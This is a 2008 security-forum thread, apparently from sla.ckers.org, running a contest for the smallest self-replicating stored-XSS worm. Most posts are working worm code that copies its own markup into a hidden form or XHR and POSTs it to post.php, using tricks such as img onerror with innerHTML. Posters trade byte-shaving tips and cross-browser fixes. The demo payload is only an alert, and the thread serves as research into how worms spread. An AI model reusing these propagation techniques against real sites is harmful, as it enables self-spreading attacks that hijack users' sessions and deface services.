Okay folks, new small challenge - no prize, just an exercise in programming skill and because I want to see the results. After reading over the XSS worm thread I got to thinking. We haven't, to my knowledge, ever had a diminutive worm writing contest. We've done it for JS injection and for pulling in remote JS but not for worms. You can submit your code to this thread directly (I'd prefer it actually so that others can benefit from what you've done). If that's for some reason not acceptable sent me your code directly and we can figure something out. Either way the winner's code must be posted in this thread. Actual cutoff to submit is Thursday the 10th of January at 7PM GMT.

So here's the contest. The code...

1) must reside in UTF-8 or ISO-8859-1 encoding (nothing exotic please)
2) must self replicate the entire payload to a page called "post.php" as a parameter called "content" on the same domain (must be POSTed to that URL, no GETs please). We'll assume post.php will properly URL unescape your code.
3) must not grow in size after propagation (if your code starts off as n bytes, it must not grow to n+x). We will assume content will get rejected by post.php if it grows beyond n bytes.
4) must run as written (not just a parameter injection - we can infer how to turn it into a parameter injection later)
5) must not use anything from cookie or GET parameter space - every line of your code must reside on the page itself (mimicking stored XSS)
6) must not use knowledge of the DOM unless you name a class or and id and use the class or id. No looking for the n-th script on the page as that will change from site to site.
7) must work in at least Internet Explorer 7.0 and Firefox 2.x
8) must have a payload of "XSS" in an alert box
9) must work in at least Apache 1.3+ and 2+ (considering the dominance in webserver market).
10) must require no user interaction or user interaction that happens on every single page without the user thinking about it (eg: mousing over anywhere in the body of a page)

The fewest bytes to run your code wins. To win the contest, your code must be the most diminutive. That is that the smallest amount of actual characters wins. Similar to the diminutive PERL contests and diminutive munitions contest, EG: [www.cypherspace.org] I'll write a post about the code when we have a winner.

Contest ends a week from now (Thursday the 10th of January at 7PM GMT). You can submit them within this thread (I'd prefer it actually so that others can benefit from what you've done). If that's for some reason not acceptable sent me your code directly and we can figure something out. Either way the winner's code must be posted in this thread. If you aren't sure about the rules or want me to look at your code first to make sure you haven't broken any rules, you can email it to me ahead of time - I won't give advice, other than clarify how any rules have been broken. Have fun guys!

Original post about this contest was here for those who want more information.
Status update can be found here
Final wrap-up and paper can be found here

- RSnake
Gotta love it. http://ha.ckers.org



Edited 10 time(s). Last edit at 01/10/2008 05:51PM by rsnake.

Are external includes/helpers allowed? Like fetching payload, utilizing post-redirectors or using helper libs? A yes would ease the task drastically and depending on the domains available the worm size would vary. So I guess no???

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>



Edited 1 time(s). Last edit at 01/04/2008 06:05AM by .mario.

I might have to take back what I said about authoring worms not being an 'academic exercise'... I can just see myself testifying... "I swear, your honor, I had no idea that rsnake was going to use the worm I submitted to hack Google..." :)

Anyhow... regarding the contest...
no knowledge of the DOM either?

Are GET parameters forbidden completely?

What is meant by "The fewest bytes to run your code wins."?

How do we submit our worm entries?

Also, You might want to clarify exactly when the submission deadline is too what with different timezones and such...

@.mario - everything has to reside on the page/domain. Nothing external.

@thornmaker - yes, I'll update the rules to include that info.

- RSnake
Gotta love it. http://ha.ckers.org

Version 1.0
<div id=d><script>alert('xss');p='<form method=post name=f action=post.php><input type=text name=content value="+encodeURI("<div id=d>"+document.getElementById(\'d\').innerHTML+"</div>")+" /></form><script>document.f.submit();</script'+'>';p='document.write("'+p+'");';eval(p);</script></div>

>> 292 bytes

EDIT:
updated alert to display "xss" as per rules :)


--------------------------------------------------

Version 1.1
Some optimising (used d=document [though IE forced my to var it first], added s="script>" to cut down on reuse of the same word. I can't remove method=post else it gets :(

<div id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+encodeURI("<div id=e>"+d.getElementById(\'e\').innerHTML+"</div>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></div>

>> 277 bytes


--------------------------------------------------

Version 1.2
...why do i need to place the code inside a div? I don't, thats another 8 bytes saved if i make it a p tag instead. Also, used escape instead of encodeURI which saved another 3 bytes

<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>


>> 266 bytes

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 5 time(s). Last edit at 01/04/2008 11:06AM by digi7al64.

@rsnake

This contest is just asking for trouble :)

Are there any legal issues for creating such a worm in the uk?

------------------------------------------------------------------------------------------------------------

(Å=[],[µ=!Å+Å][µ[È=++Å+Å+Å]+({}+Å)[Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])()[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

@Gareth Heyes - perhaps, but trouble is my middle name. So is danger. Actually I have like 40 middle names it turns out. ;) No, I'm not worried, this is academic - it won't work anywhere without modification of variables, and has no payload. The goal is to understand worm propagation and get to the underlying important pieces of code.

I'm not in the UK and am not a lawyer so I can't comment on the laws. I'm not suggesting anyone should try to weaponize the code (they could already do that with the existing worm code if they wanted anyway).



Edited 1 time(s). Last edit at 01/04/2008 11:13AM by rsnake.

<script>function(){alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURIComponent(a)+' name=content></form>');this.onload=function(){document.f.submit()}}()</script>

------------------------------------------------------------------------------------------------------------

(Å=[],[µ=!Å+Å][µ[È=++Å+Å+Å]+({}+Å)[Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])()[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

Gareth, nice code, but couldn't get it to actually run. Here is your code, minus some, that runs. The code is 234 bytes, down from your original 257.

<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>



Edited 2 time(s). Last edit at 01/04/2008 12:24PM by Matt Presson.

@Gareth arguments.callee doesnt work on IE, does it?
I have one of less than 200 bytes hehe, I'll wait for rsnake to judge if it's valid

--------------------------------
irc://irc.irchighway.net/#slackers --> sla.ckers.org IRC channel
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 1 time(s). Last edit at 01/04/2008 12:27PM by sirdarckcat.

Yes arguments.callee works in IE7

Hi!

As far as I understood the worm should be self-propagating - so the data sent has to be the same data sending the request.

I crafted a proof of concept - which carries some errors so it can only used by people who know what they do - no copy and paste (rsnake - I expect you to recognize the error in a second (many others as well of course *g*)). In this state it will XHR, alert but not propagate recursively! The length is 252 bytes for the plain JavaScript worm code:

p="alert('XSS');x=/*@cc_on!@*/1?new XMLHttpsRequest:new ActiveXObjekt('Microsoft.XMLHTTP');x.open('post','post.php');x.setRequestHeader('content-type','application/x-www-form-urlencoded');x.send('content=p=\"'+p+'\";'+p);if(!i){e(p);i=1}";
e=eval;e(p)

Here's a closer explanation:

<script>
//sla.ckers.org worm
p="alert('XSS');"
+"x=/*@cc_on!@*/1?new XMLHttpsRequest:new ActiveXObjekt('Microsoft.XMLHTTP');"
+"x.open('post','post.php');"
+"x.setRequestHeader('content-type','application/x-www-form-urlencoded');"
+"x.send('content=p=\"'+p+'\";'+p);if(!i){e(p);i=1}";""
e=eval
e(p)
</script>

The following is a pretty short way to determine which XHR object to use:

x=/*@cc_on!@*/1?new XMLHttpsRequest:new ActiveXObjekt('Microsoft.XMLHTTP')

This is just needed to perform post requests via XHR:

x.open('post','post.php');
x.setRequestHeader('content-type','application/x-www-form-urlencoded');

This part actually does the magic:

x.send('content=p=\"'+p+'\";'+p);if(!i){e(p);i=1}

The concatenation makes sure the worm sends out its own content - plus a little check at the end of the line that makes sure it won't loop on the first site it's executed. Basically the whole worm consists of some concatenation magic, XHR and a well-placed eval. If modified correctly the worm is able to propagate with infinite recursion (tested on FF2 and IE7 - should work on any other browser supporting XHR too).

Greetings,
.mario

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

@.mario - interesting... I always thought IE7.0 required var before variable definition. Learn something new every day!

One additional comment to the people who are authoring example code. One thing I've seen several people do to avoid having a prematurely ended script is to concatenate script tags like so "</scr"+"ipt>" You can also type "<\/script>" to save two bytes.

- RSnake
Gotta love it. http://ha.ckers.org

finally a sick thread to get my interest in the ol' haxin' game back up. too bad i've been out of this shit for too long, or i'd post somethin' up, myself.

hi everybody, i used to lurk here but this contest caused me to sign up. used to be a 4096 byte democoder, but quit the scene and moved on to tinkering with javascript.
size-optimizing is still in my blood, and this contest combines the best of both worlds ;-)

here's my first entry. it's 195 bytes (i added the linebreak for legibility, it will of course not appear in the actual payload).

<i><img src="/" onerror=alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>

tricks used:
- fit the code in an event handler so you can refer to the element as this, giving you a sort of "anchor" inside a largely-unknown DOM-tree.
- grab the code via innerHTML of the parentNode
- a few tricks with parentheses and functional programming style javascript in order to shave off a few more bytes

not entirely sure if it's a legal entry because:
- i only tested it in opera and firefox so i hope it works in IE7 :)
- rsnake said "no knowledge of the DOM except for classes and ids", so technically me using nextSibling and firstChild are illegal, but i believe it to be still within the spirit of the rules, because i put the elements there myself via the injection and work relative from there (if not, my apologies)

since entries are open and there are no prizes, somebody is probably gonna beat me before the end of the week, so i give you some ideas how to shave off a few more bytes:
- a shorter way to have an event handler executed immediately than the IMG/onerror technique i used here
- at first i had an entry of 176 bytes using outerHTML, which is supported in Opera and IE, but not in Firefox.
- can one leave out the space between the src and onerror attribute of the IMG tag?
- you could leave out the double quotes around the / in the IMG src attribute, but in FF, the quotes are added again in the innerHTML. so this would shave off 2 bytes, but only once. i guess that would be illegal for the contest.
- possibly some more clever javascript/functional tricks to make the code itself even shorter



Edited 1 time(s). Last edit at 01/04/2008 02:40PM by ritz.

@ritz - I agree that you were working within the spirit of the rules there - I just didn't want someone relying on the code being in a particular place on the page, and I think you worked around that nicely. But was "/" "onerror= a typo? Looks like the quote is in the wrong place. Also, from what I can tell it doesn't automatically propagate to post.php in either IE7.0 or FF2.0 when tested.

Nice first post though! We should throw contests like this more often.

- RSnake
Gotta love it. http://ha.ckers.org

@rsnake

yes the quote was typo. i fixed it, making the entry 194 bytes. except that it doesn't work :)

sorry i didn't really check if the submission bit worked. in my test-program i swapped the f.submit() for a alert(f.firstChild.value) just to check if the payload was passed correctly. i assumed the f.submit() would simply do the trick.

i'll debug to see what went wrong.

also, just to note, an earlier version of this code used outerHTML and was only 176 bytes. but alas, firefox doesn't support it..

@ritz: it should work just using

<img src onerror=alert('xss')...

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

updated code (still 195 bytes):

<i><img src="/" onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>

the thing was, i tried what .mario suggested, leaving out the quotes. this resulted in firefox giving an "unterminated string literal" error, at the closing > bracket of the <i>, so i added the double quote again. but i didn't pay attention and i added it at the wrong place ;-)

(sorry for being impatient, but this one is working properly, according to my test in FF, right?)

ritz, i haven't had a chance to test it (apologies, i will tonight) but it is very impressive still... not just for the brevity, but also for how simple and easy to read it is. I have 3 ideas for shortening it, which i'll also test when i get home in a couple hours.

Ok guys - you seem to be wanting it the hard way ;) 151 chars (FFox2.0x, Opera9.x, IE6/7)

<form method=post action=post.php><img src=x onerror=i=this.parentNode;i.lastChild.value=i.parentNode.innerHTML;i.submit()><input name=content></form>

IE6/7 might be a little bit bitchy when no surrounding body/html tags are found. But if yes it works.

Full PoC:

<html>
<body>
<form method=post action=post.php><img src=x onerror=i=this.parentNode;i.lastChild.value=i.parentNode.innerHTML;//i.submit()><input name=content></form>
</body>
</html>

<?php
echo '<plaintext>' . stripslashes($_REQUEST['content']) . '</plaintext>';
?>

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

this may be my downfall then :) after leaving behind byte bashing in 80x86 assembly in 2000, i learned how to write *readable* code .. so maybe there's some size to win by making it less readable :)

i'm intrigued how you're gonna make it smaller, i tried a few tricks, but either they didn't work, or they only worked once: firefox does some kind of "normalizing" thing when you request the innerHTML, so if you save bytes by making malformed HTML, the submitted code might have any missing characters inserted again, making every generation of the worm after the first slightly bigger.

maybe there's some space to be won by using different kinds of event handlers on different elements.

sorry .mario, but as far as i can judge, your code only works if it's the *only* thing that appears between the <body> and </body> tags when injected in post.php. otherwise the innerHTML of i.parentNode will be the entire innerHTML of the <body> tag, which is the entire page. which is quite a bit larger than 155 bytes ;-)

this is why it's so sad outerHTML is not supported in FF.

also, when i tested it in FF (1.5x) and Opera (9.x), the onerror event did not fire when i set the src to x

and finally, you forgot to have at alert('xss'), so that's 12 penalty bytes :-P

@ritz:
You can use <img src=. foobar> and save two more bytes.
Maybe I'm a little bit too late, but the robot has sent the confirmation email delayed. So, my 1st posting, guys. ;)

alex, you're right about the . ! thanks :)

<i><img src=. onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>

193 bytes

but i tried, and still x as src doesn't work. i already experimented a bit, and apparently it needs something that looks like a path in there, in order to give an onerror?

i tried, and both "." and "/" work, but letters and such don't.



Edited 2 time(s). Last edit at 01/04/2008 04:04PM by ritz.

Here's my contribution:

<b><img src onerror="alert('xss');n=(m=this.parentNode).lastChild;n.content.value='<b>'+m.innerHTML+'</b>';n.submit()"
<form method=post action=post.php><input name=content></form></b>

It's based off of ritz's. It appears to work no matter the surrounding content. I could only test in Firefox, though.

183 bytes if you take out the line feed.

A assume people are using src=. rather than just src with no value so it would run onerror in IE. If so, just add 2 bytes to that counter.

---
$emo=addslashes($wrist);

You are right - wonder why i didn't see this in the first place. So add 13 penalty bytes (one semicolon is unfortunately needed) ;)

I am trying to work out a solution which circumvents the lack of outerHTML on FF2.

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

and barbarianbob takes the cake! looks like it works! nice work shuffling those parentheses around!

also, it seems like nobody wants to bother firing up IE7 to test this code? ;-)

i dont have IE7 so i can't test, but it would be kind of a shame if everything broke in IE7..

ritz, I'm getting "(f = this.nextSibling).firstChild has no properties" trying to run your code. Bob's is the only one that then makes the browser navigate to post.php. Is that not meant to happen in the background, so the user doesn't see it?